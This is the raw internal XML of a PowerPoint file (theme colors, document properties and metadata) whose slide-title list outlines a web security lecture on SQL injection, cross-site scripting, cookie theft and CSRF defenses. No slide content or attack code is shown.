jaO8D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zJAqiX5sYaQ0q1N1vR0j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giWWh8NI3U59CxC3PVnKd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TxXgw8ihDTNirDu1PiJV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QOtaYFWDyNEm2okRhzLD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PebplUxstGG8G9MlaCk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E4A5GY0a9CjBYfZzk25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GUHa4Vo8jrTPA6Ofdzr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yBZkxJBNCN0cZvZL09X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3O5axlBhiUfGFoGnvT5L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H9ETK5OwD1sC6C0wzNQ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9VI8RHFmxuKWn0TsQcto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dLAKvmvXail30JaCd7Qh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R9fZD7XEx72tHWx6cjRz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Aj0ahdYmykbgTqvvJoZ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0V1Wiyq8TI2mgrCoimzh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0V1Wiyq8TI2mgrCoimzh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l98tW482U5y9yxXQxUe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1cXzmRPhqG21gPc4NxFz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UDQWsNaB3icYR7VvmIgcD"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="template">
  <a:themeElements>
    <a:clrScheme name="DBrumley201205 1">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="990000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E3E1E1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="990000"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="E47932"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="00709E"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="595A5A"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="009446"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="936241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 cap="flat" cmpd="sng">
          <a:miter lim="800000"/>
        </a:ln>
      </a:spPr>
      <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="1">
        <a:noAutofit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:defRPr sz="2800" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:soli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57150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7647</TotalTime>
  <Words>4463</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>773</Paragraphs>
  <Slides>75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template</vt:lpstr>
      <vt:lpstr>Web Security</vt:lpstr>
      <vt:lpstr>Web Application Overview</vt:lpstr>
      <vt:lpstr>Web Security Overview</vt:lpstr>
      <vt:lpstr>Web Security Overview</vt:lpstr>
      <vt:lpstr>Web Security Overview</vt:lpstr>
      <vt:lpstr>Injection Flaws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a Shell</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL in Web Apps</vt:lpstr>
      <vt:lpstr>SQL Attack</vt:lpstr>
      <vt:lpstr>CardSystems Attack</vt:lpstr>
      <vt:lpstr>SQL Primer</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Basic Queries</vt:lpstr>
      <vt:lpstr>Example Query</vt:lpstr>
      <vt:lpstr>Join Example</vt:lpstr>
      <vt:lpstr>Tautologies</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Even worse</vt:lpstr>
      <vt:lpstr>Reversing Table Layout</vt:lpstr>
      <vt:lpstr>Probing Number of Columns</vt:lpstr>
      <vt:lpstr>Probing Number of Columns</vt:lpstr>
      <vt:lpstr>Probing Column Names</vt:lpstr>
      <vt:lpstr>Querying extra tables with UNION</vt:lpstr>
      <vt:lpstr>Querying Database Metadata</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>After Injecting</vt:lpstr>
      <vt:lpstr>Tools</vt:lpstr>
      <vt:lpstr>Parameterized Queries with Bound Parameters</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Basic Browser Model</vt:lpstr>
      <vt:lpstr>Document Object Model</vt:lpstr>
      <vt:lpstr>Document Object Model</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Lacing JavaScript</vt:lpstr>
      <vt:lpstr>Lacing JavaScript</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Form Authentication &amp; Cookies</vt:lpstr>
      <vt:lpstr>Sessions using cookies</vt:lpstr>
      <vt:lpstr>Stealing Your Own Cookie</vt:lpstr>
      <vt:lpstr>“Reflected” XSS</vt:lpstr>
      <vt:lpstr>Reflected Example</vt:lpstr>
      <vt:lpstr>Stealing Cookies</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>“Stored” XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Injection Attacks</vt:lpstr>
      <vt:lpstr>Sanitizing Is Not Easy</vt:lpstr>
      <vt:lpstr>“Frontier Sanitization”</vt:lpstr>
      <vt:lpstr>Second-Order SQL Injection</vt:lpstr>
      <vt:lpstr>Context-Specific Sanitization</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Recall: Session Cookies</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Another Example: Home Router</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>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Darpa Presentation</dc:title>
  <dc:creator>ed</dc:creator>
  <cp:lastModifiedBy>Alexandre Rebert</cp:lastModifiedBy>
  <cp:revision>1504</cp:revision>
  <cp:lastPrinted>2012-09-29T01:49:14Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-11-02T18:57:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-11-08T13:11:54Z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  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Google.Documents.DocumentId">
    <vt:lpwstr>11L1CS3lWunNfTuci5gPLtht4ZjOn7gyfIKyZn-f7p20</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Google.Documents.RevisionId">
    <vt:lpwstr>13701622749194124332</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Google.Documents.PreviousRevisionId">
    <vt:lpwstr>17594234182614114890</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="Google.Documents.PluginVersion">
    <vt:lpwstr>2.0.2424.7283</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="Google.Documents.MergeIncapabilityFlags">
    <vt:i4>0</vt:i4>
  </property>
</Properties>
</file>